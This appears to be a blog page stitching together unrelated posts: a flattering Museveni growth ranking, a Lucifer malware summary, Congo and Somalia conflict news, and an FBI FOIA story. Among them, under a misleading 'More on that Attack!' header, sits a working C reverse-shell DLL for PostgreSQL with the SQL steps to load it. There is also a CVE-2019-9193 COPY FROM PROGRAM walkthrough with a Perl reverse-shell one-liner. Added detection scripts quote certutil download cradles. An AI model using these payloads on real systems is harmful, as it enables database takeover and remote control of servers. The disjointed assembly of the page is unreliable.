Tuesday, June 30, 2020

President Museveni ranked among the best presidents of the world

President Yoweri Kaguta Museveni has been ranked among the best presidents in the world, according to New York University and World Bank experts who placed the President 7th in terms of his influence on economic growth.
The report, first released in May 2018 by World Bank economist Steve Pennings and New York University economics professor William Easterly, indicates that Museveni is one of the leaders with a significant positive impact on their country's economic growth.
The two experts define the best leaders as those for whom the estimated leader effect is positive and significant at the 95% level, and the worst leaders as those with negative and significant leader effects.
The findings, entitled "Shrinking dictators: how much economic growth can we attribute to national leaders?", ranked Senior General Than Shwe of Burma as number one, the most influential leader, who steered his country's economic growth at 3.95% with shrinkage of just 0.71%. He was head of state of Burma between 1992 and 2011 as chairman of the State Peace and Development Council (SPDC).
"Leadership requires bold initiatives and President Museveni must be credited for this. It requires stringent and well thought out policies to reverse the decline our country was in and revamp the economy. It's not surprising that Museveni has firmly put this country on a steady economic growth," Stephen Miyingo, the Senior Presidential Advisor on Economic Affairs, said of the report. He said the report provides a third-party independent opinion which confirms what the NRM government has been telling Ugandans.
Easterly and Pennings ranked 24 world leaders and President Museveni came in 7th position, scoring higher than many powerful leaders globally, including former Prime Minister of Singapore Lee Kuan Yew and Park Chung-hee, President of South Korea between 1963 and 1979. Museveni's contribution to Uganda's economic growth is said to be a record 2.42% with a shrinkage of only 0.78% since he came to power in 1986.
The report also established that leaders like Yoweri Museveni and Seretse Khama of Botswana rank higher than Lee Kuan Yew of Singapore partly because they did well relative to the lower average regional growth in Sub-Saharan Africa compared to East and South Asia.
While making its assessment of Museveni's contribution, the report highlighted infrastructure development, now at its peak with 5,350 km of paved roads compared to 987 km in 1986. The general quality of life and standard of living have improved tremendously, together with an increase in incomes, despite population growth.
Other sectors highlighted include employment, with the national unemployment rate falling from 11% to 8%; access to the electricity grid, which increased to 22% in 2017 from 14% in 2013; and access to water, which rose from 68% to 78% over the same period. Annual revenue collections have also increased: in 2005/06 the total revenue collected was Shs 2.23 trillion, compared to the estimated Shs 20 trillion to be collected next financial year.
The report also highlighted the robust peace and security under Museveni, which has been credited for the prevailing economic growth, the restoration of freedom of speech, press freedom, freedom of worship, relative democracy, effective foreign policy, education and tourism.

Monday, June 29, 2020

Lucifer malware also mines Monero cryptocurrency on infected devices, and can drop and run leaked NSA (US National Security Agency) exploits, including DoublePulsar, EternalBlue and EternalRomance, against vulnerable devices to enable intranet infection.

Palo Alto Networks' Unit 42 researchers have discovered a new version of a "hybrid crypto-jacking malware," which they have dubbed "Lucifer."
Lucifer is capable of launching DDoS attacks and can compromise vulnerable Windows hosts using a variety of flaws of a "trivial-to-exploit nature," most of which are rated 'high' or 'critical.'
The first wave of this campaign was blocked by Palo Alto Networks on 10 June 2020, but the attacker resumed the campaign the very next day with an upgraded version of Lucifer. The campaign is still active, targeting Windows computers to mine cryptocurrency and launch intense DDoS attacks.
The researchers observed that the new variant of Lucifer is immensely powerful: it performs crypto-jacking by dropping XMRig to mine Monero, connects to a C&C server, and self-propagates by exploiting multiple vulnerabilities and by brute-forcing credentials.
Furthermore, it can drop and run leaked NSA exploits, including DoublePulsar, EternalBlue and EternalRomance, against vulnerable devices to enable intranet infection.
"Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation," the researchers said in a blog post.


NSA exploits in action:

The malware developer named it Satan DDoS but since Satan Ransomware exists already, Palo Alto researchers chose to name it as Lucifer.
The good news is that patches for the weaponized vulnerabilities are already available, but hosts that have not been updated remain exposed to crypto-jacking. Researchers urge users to apply the latest patches and updates immediately to secure their devices.
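The propagation detail quoted above, certutil being used to fetch the payload onto newly exploited hosts, is one of the more durable things to hunt for, since the LOLBin survives across malware families. The following is an added example written for this page, not Unit 42's or the malware author's code: it classifies process-creation events (image path plus command line, in the shape of Sysmon event 1 or Windows 4688) and flags certutil download cradles and -decode staging. The events, the 198.51.100.23 address and the file names are constructed samples.

```python
"""Added example: flag certutil.exe used as a download cradle or decoder in
process-creation events. Not from the original post; sample data is constructed."""
import re

# Constructed sample events: (image path, command line), Sysmon event 1 / 4688 style.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -urlcache -split -f http://198.51.100.23/spread.exe C:\Windows\Temp\spread.exe"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -verifyctl -f -split http://198.51.100.23/x.crl"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -decode C:\Users\Public\a.b64 C:\Users\Public\a.exe"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -viewstore -user My"),                     # legitimate admin use, must not fire
    (r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c certutil -urlcache -split -f http://198.51.100.23/a.exe"),  # wrapped in cmd.exe
]

URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)


def _is_certutil(token):
    """True if a command-line token names certutil, with or without path/extension/quotes."""
    name = token.strip('"').lower().rsplit("\\", 1)[-1]
    return name in ("certutil", "certutil.exe")


def classify_certutil(cmdline):
    """Return a reason string for a suspicious certutil invocation, else None.

    certutil is located anywhere in the argv rather than only at position 0,
    so a launch via "cmd.exe /c certutil ..." is still caught.
    """
    args = cmdline.split()
    idx = next((i for i, a in enumerate(args) if _is_certutil(a)), None)
    if idx is None:
        return None
    rest = args[idx + 1:]
    # certutil accepts both -flag and /flag; normalise to the bare flag name
    flags = {a.lower().lstrip("-/") for a in rest if a[:1] in "-/"}
    has_url = any(URL_RE.match(a.strip('"')) for a in rest)
    if has_url and flags & {"urlcache", "verifyctl"}:
        return "certutil download cradle (remote URL with -urlcache/-verifyctl)"
    if "decode" in flags:
        return "certutil -decode of a local file (payload staging)"
    return None


def scan(events):
    """Return [(image, cmdline, reason)] for every event that trips a rule."""
    hits = []
    for image, cmdline in events:
        reason = classify_certutil(cmdline)
        if reason:
            hits.append((image, cmdline, reason))
    return hits


if __name__ == "__main__":
    for image, cmdline, reason in scan(SAMPLE_EVENTS):
        print(f"{reason}\n    {image}\n    {cmdline}")
```

The rule keys on the flag set rather than on the image path alone, so the cmd.exe-wrapped launch and the /flag spelling both trigger it, while the -viewstore event stays quiet; pair it with a network egress check on the child process if your telemetry has it.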

Ituri province is on fire! 10 more people were killed by CODECO on the night of Sunday to Monday, 29/06/2020

Fighters of the CODECO militia carried out an attack, on the night of Sunday to Monday, June 29, 2020, in the locality of Mungulumoya, 5 km from the centre of Kunda in the Babelebe chiefdom, Irumu territory.
At least 10 civilians were killed and 3 others seriously wounded in this attack, carried out with firearms and bladed weapons.
Although the situation is now under the control of the Congolese security forces, the locality remains emptied of its population, which has fled en masse to the centre of Kunda, about ten kilometres from the city of Bunia.
Faced with this situation, provincial deputy Claude Malabo urges the Congolese state to better protect the inhabitants, who are being unjustly massacred.
"The army must secure the entities threatened by these enemies of peace. But I believe that we must also succeed in destroying them definitively. The population no longer knows how to live in peace because of the permanent threats," said the elected representative for Irumu's electoral district.
In addition to Djugu and Mahagi, certain entities in Irumu territory have also been targeted in recent months by this militia, the Cooperative for the Development of Congo (CODECO).

More on that Attack!

#define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1"
#define PG_REVSHELL_CALLHOME_PORT "4444"

/* Must precede <winsock2.h> to silence the inet_addr/inet_ntoa/gethostbyname
 * deprecation warnings; in the original it came after the includes and had no effect. */
#define _WINSOCK_DEPRECATED_NO_WARNINGS

#include "postgres.h"
#include <string.h>
#include "fmgr.h"
#include "utils/geo_decls.h"
#include <winsock2.h>

#pragma comment(lib, "ws2_32")

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

#pragma warning(push)
#pragma warning(disable: 4996)

/* DllMain runs as soon as the server loads the library, i.e. at
 * CREATE FUNCTION ... LANGUAGE C time, before any SQL-callable function is
 * invoked: connect back to the call-home host and attach cmd.exe to the socket. */
BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL,
                    _In_ DWORD fdwReason,
                    _In_ LPVOID lpvReserved)
{
    WSADATA wsaData;
    SOCKET wsock;
    struct sockaddr_in server;
    struct hostent *host;
    char ip_addr[16];
    STARTUPINFOA startupinfo;
    PROCESS_INFORMATION processinfo;

    char *program = "cmd.exe";
    const char *ip = PG_REVSHELL_CALLHOME_SERVER;
    u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);

    /* Only act on process attach; without this guard every thread attach
     * would spawn another shell. */
    if (fdwReason != DLL_PROCESS_ATTACH)
        return TRUE;

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

    /* Resolve the call-home host (a literal IP here) to dotted-quad form */
    host = gethostbyname(ip);
    strcpy_s(ip_addr, sizeof(ip_addr),
             inet_ntoa(*((struct in_addr *)host->h_addr)));

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr(ip_addr);

    WSAConnect(wsock, (SOCKADDR *)&server, sizeof(server),
               NULL, NULL, NULL, NULL);

    /* Hand the connected socket to cmd.exe as its stdin/stdout/stderr */
    memset(&startupinfo, 0, sizeof(startupinfo));
    startupinfo.cb = sizeof(startupinfo);
    startupinfo.dwFlags = STARTF_USESTDHANDLES;
    startupinfo.hStdInput = startupinfo.hStdOutput =
                            startupinfo.hStdError = (HANDLE)wsock;

    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0,
                   NULL, NULL, &startupinfo, &processinfo);

    return TRUE;
}
#pragma warning(pop) /* re-enable 4996 */

/* Add a prototype marked PGDLLEXPORT */
PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);

/* The V1 info macro must name the function that CREATE FUNCTION references;
 * the original declared add_one here, which does not exist in this module. */
PG_FUNCTION_INFO_V1(dummy_function);

Datum
dummy_function(PG_FUNCTION_ARGS)
{
    int32 arg = PG_GETARG_INT32(0);

    PG_RETURN_INT32(arg + 1);
}
Here is the convoluted process of exploitation:

postgres=# CREATE TABLE hextable (hex bytea);
postgres=# CREATE TABLE lodump (lo OID);

acidic@emma:~/$ echo "INSERT INTO hextable (hex) VALUES (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt
acidic@emma:~/$ psql -U postgres --host=localhost --file=sql.txt

postgres=# INSERT INTO lodump SELECT lo_from_bytea(0, hex) FROM hextable;
postgres=# SELECT * FROM lodump;
  lo
-------
 16409
(1 row)
postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\bin\pg_revshell.dll');
postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS
           'C:\Program Files\PostgreSQL\9.5\bin\pg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;

lo_from_bytea() turns the bytea row into a server-side large object and returns its OID, which is what lodump stores; inserting the raw bytea into the OID column (as the original listing did) fails with a type error. lo_export() then writes the large object to a path the server process can write, and CREATE FUNCTION loads the DLL, which is when DllMain fires the connect-back. The whole chain needs superuser on the database side and a writable target directory on the server.

Arbitrary command execution on PostgreSQL

PostgreSQL, commonly known as Postgres, is one of the largest and most popular database systems in the world. It is bundled with macOS Server and also has Linux and Windows versions available.
For some time I have been working with PostgreSQL, and I have been keenly monitoring a less well known 'feature' (CVE-2019-9193) which allows certain database users to gain arbitrary code execution in the context of the operating-system user running the Postgres instance. It is enabled by default on all versions of PostgreSQL from 9.3 through to the latest, 11.2, and affects all operating systems: Windows, Linux and Mac. The PostgreSQL project disputes the CVE, on the grounds that the behaviour is documented and intentionally limited to superusers and members of the pg_execute_server_program role; the practical exposure described below is the same either way.
Since version 9.3, 'COPY TO/FROM PROGRAM' has been available. It allows the database superuser, and (from PostgreSQL 11) any member of the 'pg_execute_server_program' role, to run arbitrary operating system commands. This effectively means there is no privilege separation between a database superuser and the operating-system user running the database.
This is the kind of missing defence in depth we used to see in Microsoft SQL Server back in the early 2000s, when xp_cmdshell was enabled by default. That was disabled by default in SQL Server 2005, but it is interesting how the same class of issue repeats, seemingly in cycles.
As this bug/flaw/functionality/exploit sits somewhere between a privilege escalation and arbitrary code execution, it needs some form of prior authentication. That is achieved either through direct database access with credentials, or through SQL injection in an application with PostgreSQL on the backend. In both cases, the session must be running as the superuser or as a user with 'pg_execute_server_program' membership.
To perform the attack, you simply follow these steps:
1) [Optional] Drop the table you want to use if it already exists
DROP TABLE IF EXISTS cmd_exec;
2) Create the table you want to hold the command output
CREATE TABLE cmd_exec(cmd_output text);
3) Run the system command via the COPY FROM PROGRAM function
COPY cmd_exec FROM PROGRAM 'id';
4) [Optional] View the results
SELECT * FROM cmd_exec;
5) [Optional] Clean up after yourself
DROP TABLE IF EXISTS cmd_exec;
Note that any single quotes inside your command must be doubled to escape them. For example, if you wanted to run:
echo 'hello';
You would put the whole command inside single quotes and then replace every single quote inside it with two single quotes:
'echo ''hello'';'
I have tested this on all major operating systems, and if a reverse shell is triggered you end up with the following privileges:
Windows - NT AUTHORITY/NETWORK SERVICE (low priv)
Linux - postgres (low priv)
Mac - user that installed postgres (usually an admin)
Linux and Mac OSX can usually be exploited with a perl one liner, with a command such as this:
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
I have simplified the exploitation process by releasing a new Metasploit module (which should be merged into the main framework soon), as the old postgres_payload modules only work up to around version 8. postgres_copy_from_program_cmd_exec.rb performs all of the above automatically, given valid database credentials with the required permissions. For SQL injection you will have to take the manual route. Here it is exploiting PostgreSQL 11.2 on Ubuntu 18.04:
On Windows, however, the NETWORK SERVICE user appears not to have any write privileges, but it was still possible to trigger a reverse shell using a PowerShell download cradle. This is done by setting the COMMAND variable to the PowerShell cradle command; take note to escape single quotes with a backslash \.
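Two things a practitioner wants from the procedure above are a builder that applies the quote-doubling rule without hand-editing, and a way to spot these primitives in server logs. The following is an added example written for this page, not the author's code and not the Metasploit module: quote_literal() and copy_from_program_sql() produce the statements for steps 2 to 4, and scan_log() runs a handful of regex rules over PostgreSQL statement-log lines (log_statement = 'all' format) covering COPY ... FROM PROGRAM, the lo_export() and CREATE FUNCTION ... LANGUAGE C steps from the extension write-up earlier on this page, and grants of the server-file roles. The log lines, user names and timestamps are constructed samples.

```python
"""Added example, not from the original post: build a correctly quoted
COPY ... FROM PROGRAM statement, and detect the same primitive (plus the
large-object / C-extension path) in PostgreSQL statement logs.
All sample data below is constructed."""
import re


def quote_literal(s):
    """PostgreSQL string literal: wrap in single quotes, double any embedded ones."""
    return "'" + s.replace("'", "''") + "'"


def copy_from_program_sql(table, command):
    """Statements for steps 2-4 of the procedure above, for one shell command."""
    return [
        f"CREATE TABLE {table}(cmd_output text);",
        f"COPY {table} FROM PROGRAM {quote_literal(command)};",
        f"SELECT * FROM {table};",
    ]


# Detection rules over the statement text. Case-insensitive; DOTALL so a
# statement folded across whitespace still matches.
PATTERNS = {
    "copy_from_program":
        re.compile(r"\bCOPY\b.+?\bFROM\s+PROGRAM\b", re.I | re.S),
    "lo_export":
        re.compile(r"\blo_export\s*\(", re.I),
    "c_language_function":
        re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.+?\bLANGUAGE\s+C\b", re.I | re.S),
    "server_file_role_grant":
        re.compile(r"\bGRANT\s+pg_(?:execute_server_program|read_server_files|write_server_files)\b", re.I),
}

# Constructed sample log (log_line_prefix = '%m [%p] %u@%d ', log_statement = 'all').
SAMPLE_LOG = """\
2020-06-29 10:01:02 UTC [1234] app@shop LOG:  statement: SELECT id, name FROM products WHERE id = 42
2020-06-29 10:01:09 UTC [1234] app@shop LOG:  statement: COPY cmd_exec FROM PROGRAM 'id'
2020-06-29 10:02:17 UTC [1234] app@shop LOG:  statement: COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);'''
2020-06-29 10:03:40 UTC [1290] postgres@postgres LOG:  statement: SELECT lo_export(16409, 'C:\\Program Files\\PostgreSQL\\9.5\\bin\\pg_revshell.dll')
2020-06-29 10:03:55 UTC [1290] postgres@postgres LOG:  statement: CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS 'C:\\Program Files\\PostgreSQL\\9.5\\bin\\pg_revshell.dll', 'dummy_function' LANGUAGE C STRICT
2020-06-29 10:04:10 UTC [1290] postgres@postgres LOG:  statement: COPY products TO '/tmp/products.csv'
"""

LOG_LINE_RE = re.compile(
    r"^\S+ \S+ \S+ \[(?P<pid>\d+)\] (?P<user>\w+)@(?P<db>\w+) LOG:\s+statement: (?P<stmt>.*)$"
)


def scan_log(text):
    """Return [(user, db, rule, statement)] for every logged statement matching a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        for rule, rx in PATTERNS.items():
            if rx.search(m["stmt"]):
                hits.append((m["user"], m["db"], rule, m["stmt"]))
    return hits


if __name__ == "__main__":
    for stmt in copy_from_program_sql("cmd_exec", "echo 'hello';"):
        print(stmt)
    for user, db, rule, stmt in scan_log(SAMPLE_LOG):
        print(f"[{rule}] {user}@{db}: {stmt}")
```

A plain COPY ... TO a file does not fire the first rule (it is a different, though still superuser-only, primitive), and an application role such as app@shop issuing COPY FROM PROGRAM at all is the finding: such a role should not be a superuser or a member of pg_execute_server_program in the first place.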

The Somali national army seized 4 strategic villages from Al-Shabaab this past weekend

The Somali National Army seized four strategic villages from the Al-Shabaab militant group in the Lower Juba region on Sunday.
The operations conducted by government troops took control of villages including Janay Abdale, Hilishid, Mayonde and Garasceebe in the Lower Juba region.
Lieutenant Ismail Abdimalik Moalim, commander of the 16th brigade of the Danab forces, said the operations would continue until the troops reached all areas controlled by Al-Shabaab fighters.
The commander of the Darwish forces in the Jubaland region told the media that he had begun operations against the militants in the central town of Buale, but that more effort was still needed to capture it.
The forces have been conducting operations against Al-Shabaab in the Lower Juba region in recent days to flush the militant group out of the region.

FBI refuses to reveal Christopher Steele's primary source for his notorious 'Trump-Russia' dossier in response to a Freedom of Information request

The identity of the source remains an enduring mystery, but whoever they are, they undoubtedly possess information that could shed light on the innumerable inaccuracies in the dossier, which the Bureau cited extensively in its applications for surveillance orders against Donald Trump campaign aide Carter Page.
The US Federal Bureau of Investigation has refused to release documents relating to Christopher Steele's primary source for his notorious 'Trump-Russia' dossier, in response to a Freedom of Information request filed by The Daily Caller, on the basis that the information is classified and risks identifying a confidential FBI source.
The Daily Caller sought all FBI records on an individual identified as the "Primary Sub-Source" in Justice Department inspector general Michael Horowitz's report on Crossfire Hurricane, issued in December 2019. That assessment found Steele's source contradicted and dismissed key allegations made in the dossier after being tracked down and interviewed by FBI agents in January 2017. The former MI6 operative nonetheless dressed up "rumour and speculation" as fact, and the Justice Department ruled two FISA warrants invalid because the Bureau omitted this compromising information.
In its response to the outlet, the FBI cited three exemptions under Freedom of Information laws to deny releasing the sought documents.
“The nature of your request implicates records the FBI compiles pursuant to its national security and foreign intelligence functions. [Disclosure] would trigger harm to national security interests…and/or reveal intelligence sources and methods. Disclosing source related records about an individual or entity could reasonably be expected to undermine the use of confidential sources as it would discourage cooperation with the FBI in the future. Therefore, your request is closed,” the Bureau stated.
It’s unclear if the FBI considers Steele’s source to be a confidential informant, but Steele himself reportedly told partners at Fusion GPS – the opposition research firm that commissioned the dossier – the individual was “well known to US intelligence and law enforcement officials”.
Republican lawmakers investigating the origins of the FBI's investigation of the Trump campaign have recently accused agency director Christopher Wray of releasing documents about the probe too slowly. Jim Jordan of the House Judiciary Committee has accused Wray of outright obstinacy, while Lindsey Graham, chair of the Senate Judiciary Committee, wrote to Attorney General William Barr on April 20 demanding the release of all documents and communications relating to the FBI's interviews with the source, including FBI reports written about the individual.